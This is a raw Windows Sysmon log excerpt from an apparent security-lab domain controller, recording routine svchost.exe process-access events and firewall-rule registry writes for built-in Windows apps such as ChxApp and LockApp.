13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.274{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|M=microsoft.windows.apprep.chxapp_cw5n1h2txyewy|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|D=C:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\|PFN=Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000010870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{214AED19-B7BB-4A10-8860-2E7C09DD5617}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{20EF51FF-1BD9-4275-AF88-73987641A7E7}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x800000000000000010868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{7F5FB9CD-6099-49A3-8DC2-7E02EADE500D}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 13241300x800000000000000010867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.258{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{6A9C39BA-CF0A-427B-9A02-D15C926B4082}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|Desc=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-1255970798-2717750985-493741290-1721212560-3530798636-1829112236-3118580706|EmbedCtxt=@{Microsoft.Windows.Apprep.ChxApp_1000.14393.2969.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Apprep.ChxApp/resources/DisplayName}| 
13241300x800000000000000010866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|M=microsoft.lockapp_cw5n1h2txyewy|Name=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\|PFN=Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy| 13241300x800000000000000010865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{6AA62998-79C1-4573-AAB4-78A2D41C8E99}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000010864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C40AC3AD-3CEF-4605-B027-B74F4DB2A97D}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 
13241300x800000000000000010863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{2B36EAC9-2AEC-4923-B983-44C46180AC09}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 13241300x800000000000000010862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.242{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{C3B39615-6835-4F44-8B40-336147DFBBD3}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|Desc=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312|EmbedCtxt=@{Microsoft.LockApp_10.0.14393.2068_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName}| 10341000x800000000000000010861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.227{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
